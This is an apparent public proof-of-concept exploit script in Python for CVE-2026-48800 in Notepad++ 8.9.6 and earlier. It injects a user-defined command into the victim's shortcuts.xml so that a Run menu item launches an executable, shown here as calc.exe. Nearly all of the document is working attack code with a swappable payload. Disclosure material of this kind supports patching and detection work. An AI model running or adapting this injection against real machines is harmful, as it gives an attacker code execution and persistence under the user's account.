# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution via shortcuts.xml (CVE-2026-48800)
# Date: 2026-05-31
# Exploit Author: Kavin Jindal (Avyukt Security)
# Contact: https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48800
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-3x3f-3j39-pj3v
#
# Description:
# Notepad++ reads <Command> tags from shortcuts.xml under <UserDefinedCommands> without
# validation. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, which appears as a normal Run menu entry. When the user
# clicks the injected menu item, the arbitrary command executes under the current user
# context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.


import os, sys
print(r'''
   ___         __   ____   ___ ____   __         _  _    ___   ___   ___   ___  
  / __\/\   /\/__\ |___ \ / _ \___ \ / /_       | || |  ( _ ) ( _ ) / _ \ / _ \ 
 / /   \ \ / /_\     __) | | | |__) | '_ \ _____| || |_ / _ \ / _ \| | | | | | |
/ /___  \ V //__    / __/| |_| / __/| (_) |_____|__   _| (_) | (_) | |_| | |_| |
\____/   \_/\__/   |_____|\___/_____|\___/         |_|  \___/ \___/ \___/ \___/                                                                                                                                        
''')
print("=====================================================================")
print("[+] A PoC for CVE 2026-48800 discovered in Notepad++.")
print("[+] Affected versions <= 8.9.6")
print("[+] Built by Kavin Jindal")
print("[+] Github: https://github.com/kavin-jindal/CVE-2026-48800-PoC")
print("=====================================================================\n")


appdata = os.environ["APPDATA"]
if not appdata:
    print("[!] APPDATA environment variable not found, exiting..")
    sys.exit()


config_path = os.path.join(appdata, "Notepad++", "shortcuts.xml")
existing = os.path.exists(config_path)
if existing==True:
    print("[+] Found shortcut.xml at ==>", config_path)
else:
    print("shortcut.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
    sys.exit()

x = open(config_path, 'r')
s = x.readlines()

payload='<Command name="Command Injection Demo" Ctrl="no" Alt="no" Shift="no" Key="0">calc.exe"</Command>\n'
injected=False

for num,i in enumerate(s, start=1):
    if '<UserDefinedCommands>' in i:
        print("\n[!] Injecting payload..")
        s.insert(num, payload)       
        injected=True
        break

        
if not injected:
    print("\n[!] Payload injection failed.")
    sys.exit(1)

y = open(config_path, 'w')
y.writelines(s)
print("\n[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > Run > Command Injection Demo")
print("[+] Calc.exe will launch ")